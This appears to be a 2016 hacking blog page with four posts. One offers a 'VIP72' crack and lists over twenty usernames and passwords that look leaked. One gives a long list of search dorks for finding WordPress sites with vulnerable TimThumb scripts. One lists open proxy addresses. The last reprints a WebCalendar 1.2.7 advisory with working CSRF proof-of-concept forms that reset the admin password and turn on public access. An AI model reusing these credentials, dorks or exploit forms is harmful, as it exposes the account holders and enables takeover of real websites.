Saturday, July 30, 2016

1 VIP72 Pro Version Cracker + NEW FRESH free virtual account 1 month / 3 months

7:55:00 AM Under From Admin
[1 Comment]
VIP72 Pro Version Cracker + NEW FRESH free virtual account 1 month / 3 months

Username: astrube
Password: Dcurir4665

Username: desasterx
Password: xxSakula8X

Username: justeplaycards
Password: %WorldwideShit@90!

Username: Shopeforfree
Password: 123456AZERTY/

Username: misteranonymose
Password: 921834&é"%

Username: wizzkhalifa
Password: GetHighOrDie=*/

Username: thuglife
Password: OneWifeandamistress55

Username: ChangerV
Password: Rangerceas

Username: Sezare
Password: IIX1120

Username: studiowork
Password: dannybigboss

Username: wallstreet
Password: kidsaresucjaCK

Username: nakazaki
Password: Naka005878654

Username: giangcntt
Password: 957073
Pin: 72639

Username: FEBglorious008
Password: FEBglorious008

Username: ewinkcess
Password: Qwerty1234

Username: lauriano111
Password: angelo120

Username: SINIK
Password: sinik

Username: ahmed mohamed
Password: 01155620548

Username: me1231
Password: BLESS1234

Username: tipe
Password: doumbia2015

Username: Abayomi
Password: 123456a

Username: viphulk031
Password: viphulk031

Tags:
vip72, socks5, software, socks, tutorial, network, proxy, vpn, vip72.com, help, how to setup vip72 and proxifier, setup vip72 end proxyper, vpn client, setup vi72, tutorial (media genre), proxies, lead generation (industry), anonymous, vpn software, vip72 sock client download, proxifier android, proxifier download, proxifier 3.21 key, setup proxyper, hacks, check2ip, how to, vip, best ip hider, hide proxy, hide my proxy, ip scrambler, hide my ip online, how to hide your ip address, hide ip online, hide your ip, ip address hider, how to hide ip address, ip hide, hide my ip address
by Facebook Comment
Read More »

1 WordPress TimThumb Bug Dorks 2016

7:43:00 AM Under From Admin
[1 Comment]

WordPress TimThumb Bug Dorks 2016

!tim /wp-content/themes/welcome_inn/thumb.php "/themes/welcome_inn" +page_id=
!tim /wp-content/themes/Snapwire/timthumb.php "/themes/Snapwire/"
!tim /wp-content/themes/Aggregate/timthumb.php "Aggregate Logo"
!tim /wp-content/themes/DeepFocus/timthumb.php "DeepFocus Logo"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "Sport WordPress Theme by"
!tim /wp-content/themes/TheStyle/timthumb.php "thestyle logo"
!tim /wp-content/themes/fashion/includes/thumb.php "/themes/fashion/includes/"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion theme by Sayontan Sinha"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress"
!tim /wp-content/themes/Webly/timthumb.php "webly logo"
!tim /wp-content/themes/newoffer/timthumb.php "WordPress Theme by iKarina"
!tim /wp-content/themes/modularity/includes/timthumb.php "modularity theme by"
!tim /wp-content/themes/Polished/timthumb.php "polished logo"
!tim /wp-content/themes/ecobiz/timthumb.php "Designed by imediapixel.com"
!tim /wp-content/themes/ecobiz/timthumb.php "themes/ecobiz" +"Posted on *"
!tim /wp-content/themes/Lumin/timthumb.php "Powered by WordPress" "Designed by Elegant Themes"
!tim /wp-content/themes/OptimizePress/timthumb.php "Powered by Optimizepress"
!tim /wp-content/themes/Magnificent/timthumb.php "Magnificent Logo"
!tim /wp-content/themes/goodnews/framework/scripts/timthumb.php "Goodnews Theme By Momizat Team"
!tim /wp-content/themes/Chameleon/timthumb.php "Chameleon logo"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/bestvariety/scripts/timthumb.php "/themes/bestvariety"
!tim /wp-content/themes/Envisioned/timthumb.php "envisioned logo"
!tim /wp-content/themes/AskIt/timthumb.php "AskIt logo"
!tim /wp-content/themes/dandelion_v2.5/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.2.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.2/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.3/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.4/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/retreat/thumb.php "WordPress Tumblog Theme" "Exclusively by"
!tim /wp-content/themes/kingsize/timthumb.php "Hide menu" kingsize
!tim /wp-content/themes/ElegantEstate/timthumb.php "ElegantEstate logo"
!tim /wp-content/themes/ElegantEstate/timthumb.php "/themes/ElegantEstate/"
!tim /wp-content/themes/LondonLive/thumb.php "/themes/LondonLive/"
!tim /wp-content/themes/LondonLive/thumb.php "Designed by Skyali"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme" "designed by"
!tim /wp-content/themes/openair/thumb.php "Open Air by" wordpress
!tim /wp-content/themes/mosaic/inc/timthumb.php "Theme Design by iKreativ"
!tim /wp-content/themes/striking/includes/timthumb.php "/themes/striking/"
!tim /wp-content/themes/invictus/timthumb.php "Invictus" "Background Wordpress Theme"
!tim /wp-content/themes/masterful/timthumb.php "/themes/masterful/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "Designed & Developed by der|Design"
!tim /wp-content/plugins/pointelle-slider/includes/timthumb.php "/plugins/pointelle-slider/"
!tim /wp-content/themes/TheTravelTheme/includes/timthumb.php "/themes/TheTravelTheme/"
!tim /wp-content/themes/Mentor/timthumb.php "Mentor WordPress Theme designed by"
!tim /wp-content/themes/metrolo/scripts/thumb.php "/themes/metrolo/"
!tim /wp-content/themes/webstudio/thumb.php "/themes/webstudio/"
!tim /wp-content/themes/easini/timthumb.php "/themes/easini/"
!tim /wp-content/themes/theblock/timthumb.php "/themes/theblock/"
!tim /wp-content/themes/intelligible/timthumb.php "/themes/intelligible/"
!tim /wp-content/themes/vilisya/timthumb.php "/themes/vilisya/"
!tim /wp-content/themes/Cadca/php/timthumb.php "/themes/Cadca/"
!tim /wp-content/themes/urbanhip/includes/timthumb.php "/themes/urbanhip/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "/themes/duotive-three/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "created by duotive"
!tim /wp-content/themes/hulk/scripts/timthumb.php "/themes/hulk/scripts/"
!tim /wp-content/themes/village/timthumb.php "themes/village/"
!tim /wp-content/themes/picnic/inc/timthumb.php "/themes/picnic/"
!tim /wp-content/themes/monmarthe/php/thumb.php "/themes/monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2010 Monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2011 Monmarthe"
!tim /wp-content/themes/life/scripts/timthumb.php "iamthemes.com"
!tim /wp-content/themes/life/scripts/timthumb.php "/themes/life/scripts/"
!tim /wp-content/themes/thefirm/wizy/scripts/timthumb/timthumb.php "/thefirm/wizy/scripts/timthumb/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "/themes/thecotton/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "Powered by The Cotton Theme"
!tim /wp-content/themes/gridline/lib/scripts/timthumb.php "Gridline designed and produced by"
!tim /wp-content/themes/Inspired/thumb.php "Inspired" "Designed by "
!tim /wp-content/themes/specere/inc/timthumb.php "/themes/specere/inc/"
!tim /wp-content/themes/Nova/timthumb.php "nova logo"
!tim /wp-content/themes/TheProfessional/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/TheCorporation/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/u-design/scripts/timthumb.php "U-Design is proudly powered by "
!tim /wp-content/themes/arthemia-premium/scripts/timthumb.php "Arthemia Premium by ColorLabs Project"
!tim /wp-content/themes/GrungeMag/timthumb.php "GrungeMag"
!tim /wp-content/themes/MyCuisine/timthumb.php "mycuisine logo"
!tim /wp-content/themes/dt-chocolate/thumb.php "chocolate WP" "All rights reserved"
!tim /wp-content/themes/prosto/functions/thumb.php "prosto. All rights reserved"
!tim /wp-content/themes/snapshot/thumb.php "Snapshot Theme by"
!tim /wp-content/themes/premiumnews/thumb.php "Original News Theme by "
!tim /wp-content/themes/Feather/timthumb.php "feather Logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo" "designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty" "Designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty"
!tim /wp-content/themes/gazette/thumb.php "Gazette Theme by"
!tim /wp-content/themes/flashnews/thumb.php "Flash News Theme by"
!tim /wp-content/themes/livewire/thumb.php "Live Wire Series Theme by"
!tim /wp-content/themes/overeasy/thumb.php "Powered by WordPress" "OverEasy by"
!tim /wp-content/themes/cushy/thumb.php "Cushy Theme by"
!tim /wp-content/themes/dailyedition/thumb.php "Daily Edition Theme by"
!tim /wp-content/themes/canvas/thumb.php "themes/canvas"
!tim /wp-content/themes/freshnews/thumb.php "themes/freshnews"
!tim /wp-content/themes/aperture/thumb.php "themes/aperture"
!tim /wp-content/themes/biznizz/thumb.php "themes/biznizz"
!tim /wp-content/themes/Spectrum/thumb.php "themes/Spectrum"
!tim /wp-content/themes/CoffeeBreak/thumb.php "themes/CoffeeBreak"
!tim /wp-content/themes/Continuum/thumb.php "themes/Continuum"
!tim /wp-content/themes/telegraph/scripts/timthumb.php "telegraph/scripts" "Designed by"
!tim /wp-content/themes/photoria/scripts/timthumb.php "Portfolio WordPress Theme by"
!tim /wp-content/themes/graphix/scripts/timthumb.php "themes/graphix" "Designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "cadabrapress" "All Rights Reserved" "designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/cadabrapress/scripts/"
!tim /wp-content/themes/magazinum/scripts/timthumb.php "Magazinum" "All Rights Reserved" "designed by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "WordPress Video Theme by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "/videozoom/scripts/"
!tim /wp-content/themes/manifesto/scripts/timthumb.php "manifesto/scripts"
!tim /wp-content/themes/gallery/scripts/timthumb.php "GALLERY Theme by"
!tim /wp-content/themes/optimize/thumb.php "themes/optimize"
!tim /wp-content/themes/DynamiX/lib/scripts/timthumb.php "Powered By DynamiX"
!tim /wp-content/themes/Karma/functions/timthumb.php "themes/Karma"
!tim /wp-content/themes/Karma/functions/thumbs.php "themes/Karma"
!tim /wp-content/themes/Growing-Feature/includes/thumb.php "/themes/Growing-Feature" +logo
!tim /wp-content/themes/profitstheme/thumb.php "Powered By Profits Theme From"
!tim /wp-content/themes/Nyke/timthumb.php "/themes/Nyke/"
!tim /wp-content/themes/rend/scripts/timthumb.php "themes/rend"
!tim /wp-content/themes/echea/timthumb.php "themes/echea"
!tim /wp-content/themes/awake/lib/scripts/thumb.php "themes/awake"
!tim /wp-content/themes/academica/scripts/timthumb.php "Education WordPress Theme by"
!tim /wp-content/themes/academica/scripts/timthumb.php "/academica/scripts/"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "themes/parachute"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "Parachute designed and produced by GhostPool"
!tim /wp-content/themes/soulbop/scripts/timthumb.php "soulbop/scripts"
!tim /wp-content/themes/airfolio/scripts/timthumb.php "themes/airfolio"
!tim /wp-content/themes/Romix/scripts/thumb.php "Romix/scripts"
!tim /wp-content/themes/granda/scripts/timthumb.php "/granda/scripts/"
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "/themes/aquitaine/"
!tim /wp-content/themes/ibuze/scripts/timthumb.php "/ibuze/scripts/"
!tim /wp-content/themes/reviewit/lib/scripts/timthumb.php "/themes/reviewit/"
!tim /wp-content/themes/bizpress/scripts/timthumb.php "/bizpress/scripts/"
!tim /wp-content/themes/headlines/thumb.php "themes/headlines"
!tim /wp-content/themes/genoa/timthumb.php "WordPress and WPCrunchy"
!tim /wp-content/themes/multidesign/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/smoke/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/genoa/timthumb.php "Genoa Theme"
!tim /wp-content/plugins/kino-gallery/timthumb.php "Developed by Kino Creative"
!tim /wp-content/themes/tarnished/lib/scripts/timthumb.php "Copyright © Tarnished"
!tim /wp-content/themes/exhibit/lib/scripts/timthumb.php "Exhibit designed and produced by GhostPool."
!tim /wp-content/themes/averin/timthumb.php "averin" Logo
!tim /wp-content/themes/redcarpet/thumbopen.php "themes/redcarpet/"
!tim /wp-content/themes/comfy/thumbopen.php "/themes/comfy/"
!tim /wp-content/themes/comfy-3/thumbopen.php "themes/comfy-3/"
!tim /wp-content/themes/comfy-3.0.9/thumbopen.php "/comfy-3.0.9/"
!tim /wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs · Sitemap · Privacy Policy"
!tim /wp-content/themes/widescreen/includes/timthumb.php "— Hide menu"
!tim /wp-content/themes/push/framework/lib/timthumb.php "/themes/push/framework/lib/"
!tim /wp-content/themes/headlines/thumb.php "Designed by Top Wp Plugins"
!tim /wp-content/themes/thejournal/thumb.php "/themes/thejournal/"
!tim /wp-content/themes/couponpress/thumbs/_tbs.php "/themes/couponpress/"
!tim /wp-content/themes/rockwell_v1.3/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.0/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.7.1/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/catalyst/timthumb.php "themes/catalyst"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "Clockstone" "All Rights Reserved"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "/themes/clockstone/"
!tim /wp-content/themes/sakura/plugins/woo-tumblog/functions/thumb.php "Black Sakura WP"
!tim /wp-content/themes/broadcast/thumb.php "Broadcast. All Rights Reserved"
!tim /wp-content/themes/amplus/functions/timthumb.php "/amplus/functions/"
!tim /wp-content/themes/cubed/functions/timthumb.php "/themes/cubed/functions/"
!tim /wp-content/themes/curvo/functions/timthumb.php "/curvo/functions/"
!tim /wp-content/themes/peano/functions/img_resize/timthumb.php "/themes/peano/functions"
!tim /wp-content/themes/especial/libraries/timthumb.php "Especial Wordpress Theme"
!tim /wp-content/themes/city/scripts/timthumb.php "City Themes" "All rights reserved."
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "Aquitaine Ltd. All rights reserved"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "/themes/dropholio/"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "2011 Dropholio"
!tim /wp-content/themes/stufe/scripts/timthumb.php "/stufe/scripts/"
!tim /wp-content/themes/thestation/thumb.php "/themes/thestation/"
!tim /wp-content/themes/mainstream/thumb.php "/themes/mainstream/"
!tim /wp-content/themes/rockstar/thumb.php "/themes/rockstar/"
!tim /wp-content/themes/bueno/thumb.php "/themes/bueno/"
!tim /wp-content/themes/backstage/thumb.php "/themes/backstage/"
!tim /wp-content/themes/deliciousmagazine/thumb.php "/themes/deliciousmagazine/"
!tim /wp-content/themes/mosaico/js/timthumb.php "/themes/mosaico/"
!tim /wp-content/themes/machtastic/_assets/timthumb.php "themes/machtastic"
!tim /wp-content/themes/cold/lib/timthumb.php "/themes/cold/lib/"
!tim /wp-content/themes/spicy/lib/timthumb.php "/themes/spicy/lib/"
!tim /wp-content/themes/lunar/lib/timthumb.php "/themes/lunar/lib/"
!tim /wp-content/themes/kolos/thumb.php "/themes/kolos/"
!tim /wp-content/themes/photobox/themify/img.php "/themes/photobox/"
!tim /wp-content/themes/bloggie/themify/img.php "/themes/bloggie/"
!tim /wp-content/themes/blogfolio/themify/img.php "/themes/blogfolio/"
!tim /wp-content/themes/bizco/themify/img.php "/themes/bizco/"
!tim /wp-content/themes/thememin/themify/img.php "/themes/ThemeMin"
!tim /wp-content/themes/sleex/scripts/thumb.php "/themes/sleex/"
!tim /wp-content/themes/matchpoint/functions/thumb.php "/themes/matchpoint/"
!tim /wp-content/themes/nitro/library/functions/timthumb.php "/themes/nitro/library/"
!tim /wp-content/themes/visual/library/functions/timthumb.php "/themes/visual/library/functions/"
!tim /wp-content/themes/myjourney_3.1/thumb.php "wp-content/themes/myjourney"
!tim /wp-content/themes/adinda/timthumb.php "themes/adinda"
!tim /wp-content/themes/myjourney/thumb.php "themes/myjourney/"
!tim /wp-content/themes/modus/thumb.php "/themes/modus/"
!tim /wp-content/themes/spitz/lib/scripts/timthumb.php "/themes/spitz/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "/themes/handcrafted/functions/"
!tim /wp-content/themes/vulcan/timthumb.php "/wp-content/themes/vulcan/timthumb.php"
!tim /wp-content/themes/equator/timthumb.php "/wp-content/themes/equator/timthumb.php"
!tim /wp-content/themes/FactoryWP/javascript/timthumb.php "/wp-content/themes/factory"
!tim /wp-content/themes/multimedia/thumb.php "/wp-content/themes/multimedia" ?src
!tim /wp-content/themes/glance/inc/timthumb.php "/wp-content/themes/glance"
!tim /wp-content/themes/picnic/inc/timthumb.php "/wp-content/themes/picnic"
!tim /wp-content/themes/setinstone/inc/timthumb.php "/themes/setinstone/inc/"
!tim /wp-content/themes/setinstone/inc/timthumb.php "Copyright 2011 Turkhitbox"
!tim /wp-content/themes/nvision/utils/timthumb.php "themes/nvision/utils/"
!tim /wp-content/themes/mercedesa/includes/thumb.php "/themes/mercedesa/includes/"
!tim /wp-content/themes/village/timthumb.php "/wp-content/themes/village" ?src=
!tim /wp-content/themes/explode/includes/timthumb.php "/wp-content/themes/explode/"
!tim /wp-content/themes/delight/scripts/timthumb.php "/themes/delight/scripts/"
!tim /wp-content/themes/delight/scripts/timthumb.php "©2011 Pixedelic by Consorzio Creativo"
!tim /wp-content/themes/precious/inc/timthumb.php "/themes/precious/inc/"
!tim /wp-content/themes/eruption/framework/lib/timthumb.php "/themes/eruption/"
!tim /wp-content/themes/cleanple/theme/classes/timthumb.php "/cleanple/theme/classes/"
!tim /wp-content/themes/blakesley/theme/classes/timthumb.php "/blakesley/theme/classes"
!tim /wp-content/themes/tribune/scripts/timthumb.php "tribune/scripts"
!tim /wp-content/themes/rezo/themify/img.php "wp-content/themes/Rezo" ?src=
!tim /wp-content/themes/edmin/themify/img.php "wp-content/themes/Edmin" ?src=
!tim /wp-content/themes/wigi/themify/img.php "wp-content/themes/wigi" ?src=
!tim /wp-content/themes/sidepane/themify/img.php "wp-content/themes/Sidepane" ?src=
!tim /wp-content/themes/Colt/thumb.php "wp-content/themes/Colt" ?src=
!tim /wp-content/themes/OnTheGo/timthumb.php "wp-content/themes/On the Go" ?src=
!tim /wp-content/themes/InnovationScience2/thumb.php "wp-content/themes/Innovation+Science" ?src=
!tim /wp-content/themes/Avenue/timthumb.php "wp-content/themes/Avenue" ?src=
!tim /wp-content/themes/blacklabel/framework/timthumb.php "/themes/blacklabel/"

by Facebook Comment
Read More »

Thursday, July 7, 2016

0 Anonymous Proxy List - 7 July 2016

2:13:00 AM Under From Admin
[0 Comment]
Anonymous Proxy List - 7 July 2016

Proxy List:
41.71.112.22:3128
129.254.221.157:8080
105.235.106.59:8080
174.129.110.206:80
217.115.115.249:80
186.170.31.134:8080
212.227.132.170:81
121.58.227.252:8080
78.187.87.10:3128
64.62.233.67:80
169.50.87.252:80
54.67.7.225:8083
207.91.10.234:8080
46.101.213.137:8090
221.149.97.147:80
181.143.65.117:80
89.238.67.133:80
161.202.30.245:80
174.36.234.214:8888
54.153.76.4:8083
163.54.70.3:80
91.232.196.77:80
219.65.81.124:80
198.199.80.250:3128
94.199.236.74:8080
125.212.217.215:80
203.148.20.123:8080
199.16.220.249:8080
201.249.29.65:8080
190.203.207.18:8080
177.43.243.107:8080
123.206.195.147:80
94.125.135.133:80
151.80.197.192:80
77.89.128.139:3128
202.153.130.214:80
188.165.176.63:3128
222.211.65.72:8080
201.243.197.81:8080
222.161.209.164:8102
113.108.82.29:8080
46.226.46.39:8888
46.218.85.101:3129
81.31.186.33:80
58.248.137.228:80
198.2.202.33:80
222.161.209.168:8102
23.95.7.203:80
177.87.241.94:8080
221.134.239.213:80
91.106.77.41:8080
78.94.25.98:80
178.238.229.236:80
190.221.23.158:80
149.154.64.225:80
118.175.2.186:3128
190.38.174.77:8080
182.61.57.50:80
176.198.251.91:8080
198.2.202.55:8090
190.203.150.106:8080
201.243.217.175:8080
146.52.84.73:8080
186.89.189.11:8080
223.197.56.102:80
186.89.209.166:8080
179.27.33.162:80
186.93.226.117:8080
85.15.176.223:8080
85.204.229.47:81
94.199.236.74:3128
190.0.131.108:80
50.81.91.68:8888
190.206.137.196:8080
192.5.36.25:80
212.46.199.10:8080
190.205.226.136:8080
201.209.37.178:8080
186.89.153.93:8080
118.180.15.151:8102
190.206.123.85:8080
190.36.86.83:8080
190.205.144.238:8080
182.253.206.142:80
180.166.39.252:8090
198.2.202.43:8090
200.90.109.91:8080
91.121.204.88:443
190.75.93.136:8080
190.207.189.204:8080
190.153.121.163:8080
190.206.207.204:8080
222.161.209.167:8102
82.198.197.62:80
186.89.83.176:8080
202.16.137.10:80
200.90.111.109:8080
121.14.9.76:80
80.77.29.22:80
93.187.42.74:80
222.76.217.25:80
198.2.202.49:80
186.94.185.164:8080
220.130.196.155:80
85.9.129.74:80
201.248.26.122:8080
190.77.185.205:8080
190.207.195.55:8080
198.2.202.52:8090
115.159.90.206:8088
198.2.202.45:8090
101.50.3.222:80
50.78.187.253:80
190.207.145.97:8080
92.222.108.109:3128
92.222.107.63:3128
92.222.107.50:3128
190.38.198.134:8080
182.254.222.232:80
177.87.241.226:8080
190.78.16.152:8080
187.33.229.99:8080
190.206.4.187:8080
92.222.154.59:3128
186.94.38.158:8080
201.209.9.253:8080
202.108.75.157:80
190.206.5.148:8080
186.92.12.3:8080
87.98.158.114:8080
92.222.109.62:3128
72.84.91.66:8080
190.37.97.122:8080
190.204.43.48:8080
201.210.43.209:8080
190.207.144.107:8080
190.203.197.218:8080
190.199.42.212:8080
190.207.2.47:8080
190.202.169.175:8080
46.226.46.38:8888
118.180.15.152:8102
201.243.192.181:8080
186.95.249.106:8080
103.19.108.245:3128
115.159.158.213:81
200.146.85.194:8089
85.42.90.254:8080
52.53.237.11:8083
190.207.186.115:8080
190.203.120.44:8080
190.202.164.141:8080
190.207.158.195:8080
182.61.13.122:6666
92.222.154.57:3128
186.89.109.166:8080
220.130.196.155:8080
190.75.185.49:8080
190.38.189.77:8080
190.207.253.73:8080
190.203.34.187:8080
190.0.131.101:80
200.255.122.170:8080
198.2.202.60:80
198.2.202.39:80
198.2.202.59:80
195.175.76.62:3128
186.92.2.59:8080
186.88.207.153:8080
201.54.5.115:8080
198.2.202.38:80
186.212.124.128:8080
186.94.187.82:8080
198.2.202.57:8090
23.97.54.35:80
176.31.165.141:3128
92.222.107.23:3128
120.85.132.234:80
198.2.202.40:80
198.2.202.33:8090
190.206.7.71:8080
92.222.153.172:3128
190.199.156.239:8080
198.2.202.56:8090
201.211.30.245:8080
23.95.7.195:80
190.206.150.166:8080
190.205.198.90:8080
186.94.29.89:8080
110.173.14.22:8080
92.222.154.47:3128
92.222.153.208:3128
201.211.143.207:8080
190.203.69.61:8080
190.206.249.223:8080
66.162.122.25:8080
5.135.204.110:3128
120.85.132.234:110
114.141.164.104:443
198.2.202.50:80
117.34.110.164:80
5.135.204.123:3128
203.70.30.100:8080
186.89.202.180:8080
92.222.107.238:3128
92.222.109.60:3128
201.210.205.205:8080
186.88.18.171:8080
92.222.154.56:3128
77.246.3.185:8080
31.148.219.180:80
190.79.60.210:8080
186.94.199.147:8080
190.77.60.75:8080
201.210.1.171:8080
92.222.108.119:3128
200.84.156.169:8080
186.89.122.2:8080
186.89.221.250:8080
92.222.107.62:3128
46.226.46.37:8888
186.93.28.68:8080
190.206.68.170:8080
46.226.46.36:8888
36.72.215.158:8080
218.30.99.209:81
31.208.7.22:8888
63.150.152.151:3128
92.222.108.111:3128
190.203.180.64:8080
179.236.48.207:8080
123.206.72.95:80
186.89.179.93:8080
186.95.199.121:8080
190.201.42.161:8080
92.222.107.246:3128
92.222.108.108:3128
190.206.59.43:8080
198.2.202.44:80
186.91.242.28:8080
92.222.109.74:3128
123.206.93.94:80
92.222.107.215:3128
186.89.27.35:8080
190.37.212.34:8080
182.61.12.124:80
92.222.153.175:3128
201.248.10.89:8080
186.93.232.128:8080
92.222.107.173:3128
200.105.202.195:3128
190.94.221.217:8080
190.204.180.120:8080
101.230.214.25:8080
5.135.204.122:3128
201.211.138.201:8080
198.2.202.53:8090
187.217.189.229:8080
201.242.82.101:8080
190.36.94.246:8080
92.222.107.144:3128
92.222.153.221:3128
217.218.226.83:3128
189.50.47.186:8080
186.91.159.114:8080
182.61.7.193:80
190.206.45.20:8080
162.251.86.225:80
190.207.221.9:8080
200.84.4.136:8080
201.209.207.209:8080
41.169.8.106:3128
5.135.204.120:3128
190.198.33.134:8080
198.2.202.39:8090
190.36.107.46:8080
200.90.109.130:8080
190.73.141.213:8080
186.89.162.87:8080
186.93.128.48:8080
92.222.109.43:3128
190.203.168.70:8080
186.89.155.198:8080
190.39.162.123:8080
115.159.198.184:80
27.122.12.45:3128
92.222.108.78:3128
190.203.147.203:8080
190.38.210.135:8080
190.206.127.31:8080
198.2.202.34:8090
201.248.7.11:8080
190.205.209.203:8080
201.208.52.189:8080
92.222.153.211:3128
63.150.152.151:8080
92.222.108.217:3128
190.207.229.64:8080
92.222.153.212:3128
198.2.202.60:8090
198.2.202.57:80
190.199.157.25:8080
190.6.35.225:8080
201.208.143.33:8080
198.2.202.53:80
198.2.202.37:80
190.199.223.71:8080
200.87.192.35:80
198.2.202.36:80
198.2.202.52:80
186.89.82.202:8080
186.94.138.80:8080
198.2.202.48:80
190.203.109.183:8080
190.198.22.166:8080
190.81.174.205:3128
77.123.18.56:81
190.202.191.250:8080
92.222.108.99:3128
198.2.202.35:80
31.215.234.148:8118
41.33.156.210:8080
201.243.168.211:8080
190.199.147.91:8080
186.94.82.2:8080
190.153.120.215:8080
37.19.86.242:3128
182.254.227.113:80
198.2.202.59:8090
186.94.92.33:8080
186.95.241.4:8080
92.222.107.183:3128
92.222.154.17:3128
92.222.108.196:3128
123.206.19.210:80
86.102.106.150:8080
119.29.93.248:80
198.2.202.47:80
198.2.202.36:8090
92.222.154.18:3128
89.135.121.1:3128
124.120.76.209:8888
120.25.171.189:80
186.95.181.185:8080
92.222.109.32:3128
190.75.51.196:8080
101.200.137.21:80
186.90.78.111:8080
186.91.167.36:8080
186.95.219.244:8080

223.252.33.217:18256
by Facebook Comment
Read More »

1 WebCalendar 1.2.7 - Multiple Vulnerabilities

2:04:00 AM Under From Admin
[1 Comment]

WebCalendar 1.2.7 - Multiple Vulnerabilities


[+] Credits: John Page aka HYP3RLINX
  
  
Vendor:
==========================
www.k5n.us/webcalendar.php
  
  
Product:
==================
WebCalendar v1.2.7
  
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.
  
WebCalendar can be setup in a variety of ways, such as...
  
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
  
  
  
  
Vulnerability Type:
======================
CSRF PROTECTION BYPASS
  
  
  
CVE Reference:
==============
N/A
  
  
  
Vulnerability Details:
=====================
  
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
  
From WebCalendar "include/functions.php" file on line 6117:
  
////////////////////////////////////////////////////////////
  
function require_valide_referring_url ()
{
  
 global $SERVER_URL;
  
  
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
  
   // Missing the REFERER value
  
 //die_miserable_death ( translate ( 'Invalid referring URL' ) );
  
 // Unfortunately, some version of MSIE do not send this info.
  
  return true;
  }
  
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
  
  // Gotcha.  URL of referring page is not the same as our server.
  
// This can be an instance of XSRF.
  
// (This may also happen when more than address is used for your server.
  
// However, you're not supposed to do that with this version of
  
// WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );
  
 }
  
}
  
/////////////////////////////////////////////////////////////////////////////////////////
  
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag <meta name="referrer" content="none"> to omit the
referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send
no referrer
and the vulnerable application will then happily process our CSRF requests.
  
  
  
Exploit code(s):
===============
  
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
  
  
<meta name="referrer" content="none">
  
<form id="CSRF" action="
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567"  />
<input name="upassword2" id="newpass2" type="password"  value="1234567" />
</form>
  
  
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
  
<meta name="referrer" content="none">
  
<form id="CSRF_ACCESS_CTRL" action="
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y"  />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>
